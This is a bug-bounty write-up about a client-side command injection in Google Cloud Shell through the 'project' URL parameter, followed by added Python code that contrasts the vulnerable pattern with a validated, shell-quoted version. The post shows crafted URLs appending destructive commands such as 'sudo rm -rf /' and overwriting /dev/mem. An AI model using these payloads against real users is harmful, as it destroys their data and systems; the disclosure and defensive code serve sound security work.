
Pranav venkat

Command Injection in #Google for which I got 6000$

Hey all,

A few months back I found a command injection bug in Google Cloud Shell.

Since the title says "command injection", you all might be thinking of it as a normal command injection that affects servers, but this vulnerability is quite different.
We can put it a different way, as "client-side command injection".

Let's get into the finding.

While I was testing "console.cloud.google.com", there was one URL with this pattern:

https://console.cloud.google.com/home/dashboard?project="name of the project"

OK, that's cool :v

Tested for IDOR,

Crafted the URL as
https://console.cloud.google.com/home/dashboard?project="Random project name"

E.g.:
https://console.cloud.google.com/hom...ject=project-1 (not vulnerable to IDOR)

But it reflected the name of the project in Cloud Shell.


So I tested for XSS,

Crafted the URL as
https://console.cloud.google.com/home/dashboard?project="XSS vector" (not vulnerable to XSS)

On activating Cloud Shell, there was a syntax error.

Now the creepy mind of mine came up with the idea :P to use a delimiter,

Crafted the URL as
https://console.cloud.google.com/hom...oard?project=;

There was no syntax error, and Cloud Shell was created successfully!

In Linux we can chain commands using the semicolon operator,

To make this an exploitable issue, I came up with these ideas:

Crashing the victim's VM:

https://console.cloud.google.com/hom...?project=;sudo cp /dev/zero /dev/mem
Once the victim accesses the above URL and clicks "Activate Cloud Shell", his/her VM crashes.


Deleting files: (this one had much more impact than the previous command)

https://console.cloud.google.com/hom...?project=;sudo rm -rf /
This will delete the victim's root directory, which also deletes App Engine files!

According to my research: once the victim accesses the crafted URL, the victim must click "Activate Cloud Shell" in order to make the attack successful!
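To show the defensive side of this finding, here is an added example (not code from the original post, and not Google's own code): a Python model of the vulnerable pattern, a query parameter spliced straight into shell text, next to the hardened form that allowlists the project id and shell-quotes it, plus a small check that counts how many commands a POSIX shell would actually run. The `gcloud` command template, the project-id regex and the sample parameter values are assumptions for illustration, not taken from the page.

```python
import re
import shlex

# Constructed sample values of the "project" query parameter, as they would
# look after URL decoding. The last one carries the ';' delimiter from the
# write-up, followed by a harmless command so the effect is visible.
SAMPLE_PARAMS = [
    "project-1",
    "my-app-42",
    ";echo injected",
]

# Assumption: a Google Cloud project id is 6-30 characters of lowercase
# letters, digits and hyphens, starts with a letter and does not end with a
# hyphen. Anything else (spaces, ';', quotes, ...) is rejected before it can
# reach a shell.
PROJECT_ID_RE = re.compile(r"[a-z][a-z0-9-]{4,28}[a-z0-9]")

# Hypothetical command template standing in for whatever Cloud Shell ran with
# the project name; the real command is not on the page.
COMMAND_TEMPLATE = "gcloud config set project {project}"


def build_command_unsafe(project: str) -> str:
    """Vulnerable pattern: the raw query parameter is spliced into shell text.

    A value such as ';echo injected' ends the intended command and starts a
    second one, which is exactly the client-side command injection described.
    """
    return COMMAND_TEMPLATE.format(project=project)


def build_command_safe(project: str) -> str:
    """Hardened pattern: validate against an allowlist, then shell-quote.

    Validation is the real control; quoting is defence in depth so that even a
    value that slips past a looser regex cannot terminate the command.
    """
    if not PROJECT_ID_RE.fullmatch(project):
        raise ValueError(f"rejected project id: {project!r}")
    return COMMAND_TEMPLATE.format(project=shlex.quote(project))


def command_count(shell_text: str) -> int:
    """Detection aid: number of simple commands a POSIX shell would see.

    Tokenises with shell punctuation enabled so ';', '&&', '||' and '|' come
    out as separate tokens; one intended command should yield exactly 1.
    """
    lexer = shlex.shlex(shell_text, posix=True, punctuation_chars=True)
    separators = {";", "&&", "||", "|"}
    return 1 + sum(1 for token in lexer if token in separators)


def triage(params=SAMPLE_PARAMS):
    """Run every sample through both builders and report what happens."""
    report = []
    for value in params:
        unsafe = build_command_unsafe(value)
        try:
            safe = build_command_safe(value)
        except ValueError as exc:
            safe = f"REJECTED ({exc})"
        report.append((value, command_count(unsafe), safe))
    return report


if __name__ == "__main__":
    for value, n_cmds, safe in triage():
        print(f"{value!r:24} unsafe build runs {n_cmds} command(s); safe build -> {safe}")
```

The point of `command_count` is that the unsafe builder turns the third sample into two commands while the legitimate project ids stay at one; the safe builder never gets that far because the allowlist rejects the delimiter outright. In a real console the same check belongs on the server that generates the shell command, since a client-side check can be bypassed by whoever crafts the link.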

For more details and PoC, you can refer here ->

http://www.pranav-venkat.com/2016/03...t-me-6000.html


Updated 03-16-2016 at 02:08 PM by 41.w4r10r
